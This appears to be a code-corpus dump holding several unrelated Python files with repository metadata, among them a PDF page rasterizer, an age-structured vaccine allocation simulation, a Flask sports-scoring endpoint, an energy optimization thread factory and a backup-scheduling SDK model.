cv2.putText(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)
avg_line_length: 41.553846 | max_line_length: 120 | alphanum_fraction: 0.66716
qsc_*_quality_signal values (in the column order above): 364 | 2,701 | 4.832418 | 0.428571 | 0.035816 | 0.02274 | 0.004548 | 0.018192 | 0.018192 | 0 | 0 | 0 | 0 | 0 | 0.014406 | 0.25472 | 2,701 | 64 | 121 | 42.203125 | 0.859414 | 0.336542 | 0 | 0.069767 | 0 | 0 | 0.059155 | 0.026479 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116279 | false | 0 | 0.069767 | 0 | 0.255814 | 0.093023
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 60985f194b3e048052f9cb34471c7382107a1768 | size: 2,704 | ext: py | lang: Python
max_stars: evaluation/datasets/build_dataset_images.py | hsiehkl/pdffigures2 @ 9ff2978a097f3d500dcb840d31587c26d994cb68 | licenses ["Apache-2.0"] | count 296 | events 2016-06-19T02:41:09.000Z to 2022-03-10T05:46:08.000Z
max_issues: same path, repo and licenses | count 37 | events 2016-07-07T00:11:53.000Z to 2022-03-18T07:27:32.000Z
max_forks: same path, repo and licenses | count 81 | events 2016-07-06T23:51:21.000Z to 2022-03-19T13:50:25.000Z
content:
import argparse
from os import listdir, mkdir
from os.path import join, isdir
from subprocess import call
import sys
import datasets
from shutil import which
"""
Script to use pdftoppm to turn the pdfs into single images per page
"""
def get_images(pdf_dir, output_dir, dpi, mono=True):
if which("pdftoppm") is None:
raise ValueError("Requires executable pdftopmm to be on the PATH")
if not isdir(output_dir):
print("Making %s to store rasterized PDF pages" % output_dir)
mkdir(output_dir)
if not isdir(pdf_dir):
raise ValueError(pdf_dir + " is not a directory")
pdf_doc_ids = [x.split(".pdf")[0] for x in listdir(pdf_dir)]
already_have = set()
for filename in listdir(output_dir):
if "-page" not in filename:
raise ValueError()
doc_id = filename.split("-page")[0]
if doc_id not in pdf_doc_ids:
raise ValueError("doc id %s in output dir not found in pdfs" % doc_id)
already_have.add(doc_id)
if len(already_have) != 0:
print("Already have %d docs" % len(already_have))
num_pdfs = len(listdir(pdf_dir))
for (i, pdfname) in enumerate(listdir(pdf_dir)):
if not pdfname.endswith(".pdf"):
raise ValueError()
doc_id = pdfname[:-4]
if doc_id in already_have:
continue
print("Creating images for pdf %s (%d / %d)" % (pdfname, i + 1, num_pdfs))
if (mono):
args = ["pdftoppm", "-gray", "-r", str(dpi),
"-aa", "no", "-aaVector", "no", "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
else:
args = ["pdftoppm", "-jpeg", "-r", str(dpi), "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
retcode = call(args)
if retcode != 0:
raise ValueError("Bad return code for <%s> (%d)", " ".join(args), retcode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Cache rasterized page images for a dataset')
parser.add_argument("dataset", choices=datasets.DATASETS.keys(), help="target dataset")
parser.add_argument("color", choices=["gray", "color"], help="kind of images to render")
args = parser.parse_args()
dataset = datasets.get_dataset(args.dataset)
print("Running on dataset: " + dataset.name)
if args.color == "gray":
get_images(dataset.pdf_dir, dataset.page_images_gray_dir,
dataset.IMAGE_DPI, True)
elif args.color == "color":
get_images(dataset.pdf_dir, dataset.page_images_color_dir,
dataset.COLOR_IMAGE_DPI, False)
else:
exit(1)
avg_line_length: 36.053333 | max_line_length: 94 | alphanum_fraction: 0.616864
qsc_*_quality_signal values (in the column order above): 366 | 2,704 | 4.393443 | 0.31694 | 0.037313 | 0.024254 | 0.037313 | 0.105721 | 0.105721 | 0.105721 | 0.105721 | 0.057214 | 0.057214 | 0 | 0.003483 | 0.256657 | 2,704 | 74 | 95 | 36.540541 | 0.796517 | 0 | 0 | 0.101695 | 0 | 0 | 0.177634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016949 | false | 0 | 0.118644 | 0 | 0.135593 | 0.067797
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 609c86e4469f43e38a1d6ec5480ccb39cd4fde7a | size: 1,776 | ext: py | lang: Python
max_stars: vision/_file_utils.py | BrianOfrim/boja @ 6571fbbfb7f015e96e80e822d9dc96b4636b4119 | licenses ["MIT"] | count 7 | events 2020-01-27T18:39:02.000Z to 2022-02-14T13:23:40.000Z
max_issues: vision/_file_utils.py | a428tm/boja @ 6571fbbfb7f015e96e80e822d9dc96b4636b4119 | licenses ["MIT"] | count 1 | events 2021-06-02T00:55:25.000Z to 2021-06-02T00:55:25.000Z
max_forks: vision/_file_utils.py | a428tm/boja @ 6571fbbfb7f015e96e80e822d9dc96b4636b4119 | licenses ["MIT"] | count 6 | events 2020-01-28T21:28:23.000Z to 2020-12-28T14:35:06.000Z
content:
from typing import List
import os
import re
def create_output_dir(dir_name) -> bool:
if not os.path.isdir(dir_name) or not os.path.exists(dir_name):
print("Creating output directory: %s" % dir_name)
try:
os.makedirs(dir_name)
except OSError:
print("Creation of the directory %s failed" % dir_name)
return False
else:
print("Successfully created the directory %s " % dir_name)
return True
else:
return True
def get_files_from_dir(dir_path: str, file_type: str = None) -> List[str]:
if not os.path.isdir(dir_path):
return []
file_paths = [
f for f in os.listdir(dir_path) if os.path.isfile(os.path.join(dir_path, f))
]
if file_type is not None:
file_paths = [f for f in file_paths if f.lower().endswith(file_type.lower())]
return file_paths
def _int_string_sort(file_name) -> int:
match = re.match("[0-9]+", os.path.basename(file_name))
if not match:
return 0
return int(match[0])
def get_highest_numbered_file(
dir_path: str, file_type: str = None, filter_keyword=None
) -> str:
file_names = get_files_from_dir(dir_path)
if file_type is not None:
file_names = [
file_name
for file_name in file_names
if file_name.lower().endswith(file_type.lower())
]
if filter_keyword is not None:
file_names = [
file_name
for file_name in file_names
if filter_keyword.lower() in file_name.lower()
]
if len(file_names) == 0:
return None
highest_numbered_file = sorted(file_names, key=_int_string_sort, reverse=True)[0]
return os.path.join(dir_path, highest_numbered_file)
avg_line_length: 29.6 | max_line_length: 85 | alphanum_fraction: 0.628378
qsc_*_quality_signal values (in the column order above): 261 | 1,776 | 4.034483 | 0.260536 | 0.060779 | 0.025641 | 0.037037 | 0.353276 | 0.271605 | 0.173789 | 0.094967 | 0.094967 | 0.094967 | 0 | 0.004677 | 0.27759 | 1,776 | 59 | 86 | 30.101695 | 0.816056 | 0 | 0 | 0.24 | 0 | 0 | 0.060811 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.06 | 0 | 0.32 | 0.06
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 609cf5344b535f0910e1e3a47704f4e750a0c25d | size: 5,355 | ext: py | lang: Python
max_stars / max_issues / max_forks: vaccine_allocation/epi_simulations.py | COVID-IWG/epimargin-studies @ 7d4a78e2e6713c6a0aea2cd2440529153e9a635d | licenses ["MIT"] | counts null | event datetimes null
content:
import dask
import numpy as np
import pandas as pd
from epimargin.models import Age_SIRVD
from epimargin.utils import annually, normalize, percent, years
from studies.vaccine_allocation.commons import *
from tqdm import tqdm
import warnings
warnings.filterwarnings("error")
num_sims = 1000
simulation_range = 1 * years
phi_points = [_ * percent * annually for _ in (25, 50, 100, 200)]
simulation_initial_conditions = pd.read_csv(data/f"all_india_coalesced_scaling_Apr15.csv")\
.drop(columns = ["Unnamed: 0"])\
.set_index(["state", "district"])
rerun_states = ["Telangana", "Uttarakhand", "Jharkhand", "Arunachal Pradesh", "Nagaland", "Sikkim"] + coalesce_states
districts_to_run = simulation_initial_conditions
num_age_bins = 7
seed = 0
MORTALITY = [6, 5, 4, 3, 2, 1, 0]
CONTACT = [1, 2, 3, 4, 0, 5, 6]
CONSUMPTION = [4, 5, 6, 3, 2, 1, 0]
def save_metrics(tag, policy, dst = tev_src):
np.savez_compressed(dst/f"{tag}.npz",
dT = policy.dT_total,
dD = policy.dD_total,
pi = policy.pi,
q0 = policy.q0,
q1 = policy.q1,
Dj = policy.D
)
def prioritize(num_doses, S, prioritization):
Sp = S[:, prioritization]
dV = np.where(Sp.cumsum(axis = 1) <= num_doses, Sp, 0)
dV[np.arange(len(dV)), (Sp.cumsum(axis = 1) > dV.cumsum(axis = 1)).argmax(axis = 1)] = num_doses - dV.sum(axis = 1)
return dV[:, sorted(range(len(prioritization)), key = prioritization.__getitem__)].clip(0, S)
def process(district_data):
(
(state, district), state_code,
sero_0, N_0, sero_1, N_1, sero_2, N_2, sero_3, N_3, sero_4, N_4, sero_5, N_5, sero_6, N_6, N_tot,
Rt, Rt_upper, Rt_lower, S0, I0, R0, D0, dT0, dD0, V0, T_ratio, R_ratio
) = district_data
try:
S0 = int(S0)
except ValueError as e:
print (state, district, e)
return
Sj0 = np.array([(1 - sj) * Nj for (sj, Nj) in zip([sero_0, sero_1, sero_2, sero_3, sero_4, sero_5, sero_6], [N_0, N_1, N_2, N_3, N_4, N_5, N_6])])
# distribute historical doses assuming mortality prioritization
Sj0 = prioritize(V0, Sj0.copy()[None, :], MORTALITY)[0]
def get_model(seed = 0):
model = Age_SIRVD(
name = state_code + "_" + district,
population = N_tot - D0,
dT0 = (np.ones(num_sims) * dT0).astype(int),
Rt0 = 0 if S0 == 0 else Rt * N_tot / S0,
S0 = np.tile( Sj0, num_sims).reshape((num_sims, -1)),
I0 = np.tile((fI * I0).T, num_sims).reshape((num_sims, -1)),
R0 = np.tile((fR * R0).T, num_sims).reshape((num_sims, -1)),
D0 = np.tile((fD * D0).T, num_sims).reshape((num_sims, -1)),
mortality = np.array(list(OD_IFRs.values())),
infectious_period = infectious_period,
random_seed = seed,
)
model.dD_total[0] = np.ones(num_sims) * dD0
model.dT_total[0] = np.ones(num_sims) * dT0
return model
for phi in phi_points:
num_doses = phi * (S0 + I0 + R0)
sim_tag = f"{state_code}_{district}_phi{int(phi * 365 * 100)}_"
random_model, mortality_model, contact_model, no_vax_model = [get_model(seed) for _ in range(4)]
for t in range(simulation_range):
if t <= 1/phi:
dV_random = num_doses * normalize(random_model.N[-1], axis = 1).clip(0)
dV_mortality = prioritize(num_doses, mortality_model.N[-1], MORTALITY ).clip(0)
dV_contact = prioritize(num_doses, contact_model.N[-1], CONTACT ).clip(0)
else:
dV_random, dV_mortality, dV_contact = np.zeros((num_sims, 7)), np.zeros((num_sims, 7)), np.zeros((num_sims, 7))
random_model .parallel_forward_epi_step(dV_random, num_sims = num_sims)
mortality_model.parallel_forward_epi_step(dV_mortality, num_sims = num_sims)
contact_model .parallel_forward_epi_step(dV_contact, num_sims = num_sims)
no_vax_model .parallel_forward_epi_step(dV = np.zeros((7, num_sims))[:, 0], num_sims = num_sims)
if phi == phi_points[0]:
save_metrics(sim_tag + "novax", no_vax_model )
save_metrics(sim_tag + "random", random_model )
save_metrics(sim_tag + "mortality", mortality_model)
save_metrics(sim_tag + "contact", contact_model )
if __name__ == "__main__":
distribute = False
if distribute:
with dask.config.set({"scheduler.allowed-failures": 1}):
client = dask.distributed.Client(n_workers = 1, threads_per_worker = 1)
print(client.dashboard_link)
with dask.distributed.get_task_stream(client) as ts:
futures = []
for district in districts_to_run.itertuples():
futures.append(client.submit(process, district, key = ":".join(district[0])))
dask.distributed.progress(futures)
else:
failures = []
for t in tqdm(districts_to_run.itertuples(), total = len(districts_to_run)):
process(t)
# try:
# process(t)
# except Exception as e:
# failures.append((e, t))
for failure in failures:
print(failure)
avg_line_length: 45 | max_line_length: 150 | alphanum_fraction: 0.597572
qsc_*_quality_signal values (in the column order above): 740 | 5,355 | 4.071622 | 0.283784 | 0.055758 | 0.018586 | 0.022569 | 0.124461 | 0.09625 | 0.037836 | 0.014935 | 0.014935 | 0.014935 | 0 | 0.038135 | 0.275257 | 5,355 | 118 | 151 | 45.381356 | 0.738212 | 0.024837 | 0 | 0.019417 | 0 | 0 | 0.047354 | 0.018788 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038835 | false | 0 | 0.07767 | 0 | 0.145631 | 0.029126
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 609d2577b79fe5b4822db1b8e2ab1b0bb0027683 | size: 1,975 | ext: py | lang: Python
max_stars: src/core/agent_state.py | nandofioretto/py_dcop @ fb2dbc97b69360f5d1fb67d84749e44afcdf48c3 | licenses ["Apache-2.0"] | count 4 | events 2018-08-06T08:55:36.000Z to 2018-09-28T12:54:21.000Z
max_issues: same path, repo and licenses | count null | events null
max_forks: same path, repo and licenses | count null | events null
content:
'''Every agent has an agent state, which is its local view of the world'''
import numpy as np
import itertools
class AgentState:
def __init__(self, name, agt, seed=1234):
self.name = name
self.prng = np.random.RandomState(seed)
# contains the variable assignment (exploreD) for this agent and its neighbors
self.variables_assignments = {var.name: var.value for var in agt.variables}
self.this_agt = agt
## Data structures to explore assignment local to an agent
self.my_vars = [var.name for var in agt.variables]
# the iterator to all possible assignment for this agent
self.assignment_it = 0
# All possible assignments for the variables of this agent
domains = [var.domain for var in agt.variables]
self.agt_assignments_list = list(itertools.product(*domains))
def addNeighborsVariables(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def recvNeighborsValues(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def copyAgtAssignmentToState(self):
for var in self.this_agt.variables:
self.variables_assignments[var.name] = var.value
def nextAssignment(self):
'''
If a next assignment for the agent local variables exists, then assign it
:var self.variables_assignments and return True. Otherwise return False.
'''
if self.assignment_it < len(self.agt_assignments_list):
self.setAssignmentIt(self.assignment_it)
self.assignment_it += 1
return True
else:
# Reset iterator
self.assignment_it = 0
return False
def setAssignmentIt(self, it):
for i, var_name in enumerate(self.my_vars):
self.variables_assignments[var_name] = self.agt_assignments_list[it][i]
avg_line_length: 38.72549 | max_line_length: 86 | alphanum_fraction: 0.663797
qsc_*_quality_signal values (in the column order above): 250 | 1,975 | 5.136 | 0.32 | 0.038162 | 0.11215 | 0.10514 | 0.270249 | 0.23053 | 0.193146 | 0.162773 | 0.162773 | 0.123053 | 0 | 0.004804 | 0.262278 | 1,975 | 51 | 87 | 38.72549 | 0.876458 | 0.241013 | 0 | 0.21875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.0625 | 0 | 0.34375 | 0
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 60a02b70b3feadeb7f3f6ef29e2296758c121c15 | size: 2,782 | ext: py | lang: Python
max_stars / max_issues / max_forks: src/routes/scoring.py | jtillman20/cfb-data-api @ 69bcae225e4fa0616eb526bd608e20ace17f1816 | licenses ["MIT"] | counts null | event datetimes null
content:
from typing import Union
from flask import request
from flask_restful import Resource
from exceptions import InvalidRequestError
from models import Scoring
from utils import flask_response, rank, sort
class ScoringRoute(Resource):
@flask_response
def get(self, side_of_ball: str) -> Union[Scoring, list[Scoring]]:
"""
GET request to get scoring offense or defense for the given years.
If team is provided only get scoring data for that team.
Args:
side_of_ball (str): Offense or defense
Returns:
Union[Scoring, list[Scoring]]: Scoring data for all teams
or only scoring data for one team
"""
if side_of_ball not in ['offense', 'defense']:
raise InvalidRequestError(
"Side of ball must be either 'offense' or 'defense'")
sort_attr = request.args.get('sort', 'points_per_game')
secondary_attr, secondary_reverse = secondary_sort(
attr=sort_attr, side_of_ball=side_of_ball)
try:
start_year = int(request.args['start_year'])
except KeyError:
raise InvalidRequestError(
'Start year is a required query parameter')
except ValueError:
raise InvalidRequestError(
'Query parameter start year must be an integer')
end_year = request.args.get('end_year')
team = request.args.get('team')
if end_year is not None:
try:
end_year = int(end_year)
except ValueError:
raise InvalidRequestError(
'Query parameter end year must be an integer')
scoring = Scoring.get_scoring(
side_of_ball=side_of_ball,
start_year=start_year,
end_year=end_year,
team=team
)
if isinstance(scoring, Scoring):
return scoring
attrs = [secondary_attr, sort_attr]
reverses = [secondary_reverse, side_of_ball == 'offense']
scoring = sort(data=scoring, attrs=attrs, reverses=reverses)
return rank(data=scoring, attr=sort_attr)
def secondary_sort(attr: str, side_of_ball: str) -> tuple:
"""
Determine the secondary sort attribute and order when the
primary sort attribute has the same value.
Args:
attr (str): The primary sort attribute
side_of_ball (str): Offense or defense
Returns:
tuple: Secondary sort attribute and sort order
"""
if attr == 'points_per_game':
secondary_attr = 'games'
elif attr in ['points', 'relative_points_per_game']:
secondary_attr = 'points_per_game'
else:
secondary_attr = attr
return secondary_attr, side_of_ball == 'offense'
avg_line_length: 30.571429 | max_line_length: 74 | alphanum_fraction: 0.626528
qsc_*_quality_signal values (in the column order above): 335 | 2,782 | 5.023881 | 0.271642 | 0.042781 | 0.071301 | 0.030897 | 0.199643 | 0.130719 | 0.042781 | 0.042781 | 0 | 0 | 0 | 0 | 0.300503 | 2,782 | 90 | 75 | 30.911111 | 0.864851 | 0.193386 | 0 | 0.156863 | 0 | 0 | 0.146273 | 0.011252 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039216 | false | 0 | 0.117647 | 0 | 0.235294 | 0
unsuffixed qsc_* fields: all 0, except qsc_code_frac_words_unique and qsc_code_cate_encoded_data which are null
effective: 1 | hits: 0

hexsha: 60a3e925a35adb27a53e4a197d8b807d37a073ac | size: 13,745 | ext: py | lang: Python
max_stars / max_issues / max_forks: swagger_server/controllers/threadFactory.py | garagonc/optimization-framework @ 1ca57699d6a3f2f98dcaea96430e75c3f847b49f | licenses ["Apache-2.0"] | counts null | event datetimes null
content:
import os
import configparser
import json
import time
from IO.inputConfigParser import InputConfigParser
from IO.redisDB import RedisDB
from optimization.ModelException import MissingKeysException
from optimization.controllerDiscrete import OptControllerDiscrete
from optimization.controllerMpc import OptControllerMPC
from optimization.controllerStochasticTestMulti import OptControllerStochastic
#from optimization.controllerStochasticTestPebble import OptControllerStochastic
from prediction.machineLearning import MachineLearning
from prediction.prediction import Prediction
from prediction.pvPrediction import PVPrediction
from utils_intern.constants import Constants
from utils_intern.messageLogger import MessageLogger
class ThreadFactory:
def __init__(self, model_name, control_frequency, horizon_in_steps, dT_in_seconds, repetition, solver, id,
optimization_type, single_ev, restart):
self.id = id
self.logger = MessageLogger.get_logger(__name__, id)
self.model_name = model_name
self.control_frequency = control_frequency
self.horizon_in_steps = horizon_in_steps
self.dT_in_seconds = dT_in_seconds
self.repetition = repetition
self.solver = solver
self.optimization_type = optimization_type
self.single_ev = single_ev
self.redisDB = RedisDB()
self.pyro_mip_server = None
#restart = True
self.restart = restart
def getFilePath(self, dir, file_name):
# print(os.path.sep)
# print(os.environ.get("HOME"))
project_dir = os.path.dirname(os.path.realpath(__file__))
data_file = os.path.join("/usr/src/app", dir, file_name)
return data_file
def startOptControllerThread(self):
self.logger.info("Creating optimization controller thread")
self.logger.info("Number of repetitions: " + str(self.repetition))
self.logger.info("Output with the following control_frequency: " + str(self.control_frequency))
self.logger.info("Optimization calculated with the following horizon_in_steps: " + str(self.horizon_in_steps))
self.logger.info("Optimization calculated with the following dT_in_seconds: " + str(self.dT_in_seconds))
self.logger.info("Optimization calculated with the following model: " + self.model_name)
self.logger.info("Optimization calculated with the following solver: " + self.solver)
self.logger.info("Optimization calculated with the following optimization_type: " + self.optimization_type)
self.redisDB.set("Error mqtt" + self.id, False)
#self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id)))
# Creating an object of the configuration file (standard values)
try:
config = configparser.RawConfigParser()
config.read(self.getFilePath("optimization/resources", "ConfigFile.properties"))
except Exception as e:
self.logger.error(e)
# Loads the solver name if it was not given thorough the endpoint command/start/id
if not self.model_name:
self.model_name = config.get("SolverSection", "model.name")
self.logger.debug("This is the model name: " + self.model_name)
self.model_path = os.path.join(config.get("SolverSection", "model.base.path"), self.model_name) + ".py"
self.logger.debug("This is the path of the model: " + str(self.model_path))
# Loads the solver name if not specified in command/start/id
if not self.solver:
self.solver_name = config.get("SolverSection", "solver.name")
else:
self.solver_name = self.solver
self.logger.debug("Optimization calculated with the following solver: " + self.solver_name)
##############################################################################################
output_config = None
try:
# Reads the registry/output and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Output.registry.mqtt")
if not os.path.exists(path):
self.logger.debug("Output.registry.mqtt not set, only file output available")
else:
with open(path, "r") as file:
output_config = json.loads(file.read())
except Exception as e:
self.logger.error("Output.registry.mqtt not set, only file output available")
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.file")
if not os.path.exists(path):
input_config_file = {}
self.logger.debug("Not Input.registry.file present")
else:
with open(path, "r") as file:
input_config_file = json.loads(file.read())
self.logger.debug("Input.registry.file found")
except Exception as e:
self.logger.error("Input file not found")
input_config_file = {}
self.logger.error(e)
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.mqtt")
if not os.path.exists(path):
input_config_mqtt = {}
self.logger.debug("Not Input.registry.mqtt present")
else:
with open(path, "r") as file:
input_config_mqtt = json.loads(file.read())
self.logger.debug("Input.registry.mqtt found")
except Exception as e:
self.logger.error("Input file not found")
input_config_mqtt = {}
self.logger.error(e)
persist_base_path = config.get("IO", "persist.base.file.path")
persist_base_path = os.path.join(os.getcwd(), persist_base_path, str(self.id), Constants.persisted_folder_name)
input_config_parser = InputConfigParser(input_config_file, input_config_mqtt, self.model_name, self.id,
self.optimization_type, persist_base_path, self.restart)
missing_keys = input_config_parser.check_keys_for_completeness()
if len(missing_keys) > 0:
raise MissingKeysException("Data source for following keys not declared: " + str(missing_keys))
opt_values = input_config_parser.get_optimization_values()
self.redisDB.set(self.id+":opt_values", json.dumps(opt_values))
self.prediction_threads = {}
self.prediction_names = input_config_parser.get_prediction_names()
if self.prediction_names is not None and len(self.prediction_names) > 0:
for prediction_name in self.prediction_names:
flag = input_config_parser.get_forecast_flag(prediction_name)
if flag:
self.logger.info("Creating prediction controller thread for topic " + str(prediction_name))
topic_param = input_config_parser.get_params(prediction_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "load"})
self.redisDB.set("train:" + self.id + ":" + prediction_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[prediction_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, prediction_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "load", opt_values)
self.prediction_threads[prediction_name].start()
self.pv_lstm_names = input_config_parser.get_pv_lstm_names()
if self.pv_lstm_names is not None and len(self.pv_lstm_names) > 0:
for pv_lstm_name in self.pv_lstm_names:
flag = input_config_parser.get_forecast_flag(pv_lstm_name)
if flag:
self.logger.info("Creating pv lstm controller thread for topic " + str(pv_lstm_name))
topic_param = input_config_parser.get_params(pv_lstm_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "pv"})
self.redisDB.set("train:" + self.id + ":" + pv_lstm_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[pv_lstm_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, pv_lstm_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "pv", opt_values)
self.prediction_threads[pv_lstm_name].start()
self.non_prediction_threads = {}
self.non_prediction_names = input_config_parser.get_pv_prediction_names()
if self.non_prediction_names is not None and len(self.non_prediction_names) > 0:
for non_prediction_name in self.non_prediction_names:
flag = input_config_parser.get_forecast_flag(non_prediction_name)
if flag:
self.non_prediction_threads[non_prediction_name] = PVPrediction(config, output_config,
input_config_parser,
self.id,
self.control_frequency,
self.horizon_in_steps,
self.dT_in_seconds,
non_prediction_name)
self.non_prediction_threads[non_prediction_name].start()
# Initializing constructor of the optimization controller thread
if self.optimization_type == "MPC":
self.opt = OptControllerMPC(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "discrete":
self.opt = OptControllerDiscrete(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "stochastic":
self.opt = OptControllerStochastic(self.id, self.solver_name, self.model_path,
self.control_frequency, self.repetition, output_config,
input_config_parser, config, self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type, self.single_ev)
try:
####starts the optimization controller thread
self.logger.debug("Mqtt issue " + str(self.redisDB.get("Error mqtt" + self.id)))
if "False" in self.redisDB.get("Error mqtt" + self.id):
self.opt.start()
self.logger.debug("Optimization object started")
return 0
else:
self.redisDB.set("run:" + self.id, "stopping")
self.stopOptControllerThread()
self.redisDB.set("run:" + self.id, "stopped")
self.logger.error("Optimization object could not be started")
return 2
except Exception as e:
self.logger.error(e)
return 1
def stopOptControllerThread(self):
try:
# stop as per ID
for name, obj in self.prediction_threads.items():
self.redisDB.remove("train:" + self.id + ":" + name)
obj.Stop()
for name, obj in self.non_prediction_threads.items():
obj.Stop()
self.logger.info("Stopping optimization controller thread")
self.opt.Stop()
self.logger.info("Optimization controller thread stopped")
return "Optimization controller thread stopped"
except Exception as e:
self.logger.error(e)
return e
def is_running(self):
return not self.opt.get_finish_status()
def update_training_params(self, key, parameters):
while True:
self.redisDB.set(key, parameters)
time.sleep("60")
| 56.102041
| 120
| 0.587923
| 1,473
| 13,745
| 5.270876
| 0.133741
| 0.042504
| 0.037223
| 0.028336
| 0.535291
| 0.470762
| 0.411772
| 0.367079
| 0.27035
| 0.216641
| 0
| 0.000968
| 0.323463
| 13,745
| 244
| 121
| 56.331967
| 0.833961
| 0.051437
| 0
| 0.269608
| 0
| 0
| 0.125396
| 0.010134
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.073529
| 0.004902
| 0.142157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60a47f3e241e5f669273b6d0c92cbb5374b0f349
| 3,970
|
py
|
Python
|
cohesity_management_sdk/models/scheduling_policy.py
|
chandrashekar-cohesity/management-sdk-python
|
9e6ec99e8a288005804b808c4e9b19fd204e3a8b
|
[
"Apache-2.0"
] | 1
|
2021-01-07T20:36:22.000Z
|
2021-01-07T20:36:22.000Z
|
cohesity_management_sdk/models/scheduling_policy.py
|
chandrashekar-cohesity/management-sdk-python
|
9e6ec99e8a288005804b808c4e9b19fd204e3a8b
|
[
"Apache-2.0"
] | null | null | null |
cohesity_management_sdk/models/scheduling_policy.py
|
chandrashekar-cohesity/management-sdk-python
|
9e6ec99e8a288005804b808c4e9b19fd204e3a8b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.continuous_schedule
import cohesity_management_sdk.models.daily_schedule
import cohesity_management_sdk.models.monthly_schedule
import cohesity_management_sdk.models.rpo_schedule
class SchedulingPolicy(object):
"""Implementation of the 'SchedulingPolicy' model.
Specifies settings that define a backup schedule for a Protection Job.
Attributes:
continuous_schedule (ContinuousSchedule): Specifies the time interval
between two Job Runs of a continuous backup schedule and any
blackout periods when new Job Runs should NOT be started. Set if
periodicity is kContinuous.
daily_schedule (DailySchedule): Specifies a daily or weekly backup
schedule. Set if periodicity is kDaily.
monthly_schedule (MonthlySchedule): Specifies a monthly backup
schedule. Set if periodicity is kMonthly.
periodicity (PeriodicityEnum): Specifies how often to start new Job
Runs of a Protection Job. 'kDaily' means new Job Runs start daily.
'kMonthly' means new Job Runs start monthly. 'kContinuous' means
new Job Runs repetitively start at the beginning of the specified
time interval (in hours or minutes). 'kContinuousRPO' means this
is an RPO schedule.
rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if
periodicity is kContinuousRPO.
"""
# Create a mapping from Model property names to API property names
_names = {
"continuous_schedule":'continuousSchedule',
"daily_schedule":'dailySchedule',
"monthly_schedule":'monthlySchedule',
"periodicity":'periodicity',
"rpo_schedule":'rpoSchedule'
}
def __init__(self,
continuous_schedule=None,
daily_schedule=None,
monthly_schedule=None,
periodicity=None,
rpo_schedule=None):
"""Constructor for the SchedulingPolicy class"""
# Initialize members of the class
self.continuous_schedule = continuous_schedule
self.daily_schedule = daily_schedule
self.monthly_schedule = monthly_schedule
self.periodicity = periodicity
self.rpo_schedule = rpo_schedule
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
continuous_schedule = cohesity_management_sdk.models.continuous_schedule.ContinuousSchedule.from_dictionary(dictionary.get('continuousSchedule')) if dictionary.get('continuousSchedule') else None
daily_schedule = cohesity_management_sdk.models.daily_schedule.DailySchedule.from_dictionary(dictionary.get('dailySchedule')) if dictionary.get('dailySchedule') else None
monthly_schedule = cohesity_management_sdk.models.monthly_schedule.MonthlySchedule.from_dictionary(dictionary.get('monthlySchedule')) if dictionary.get('monthlySchedule') else None
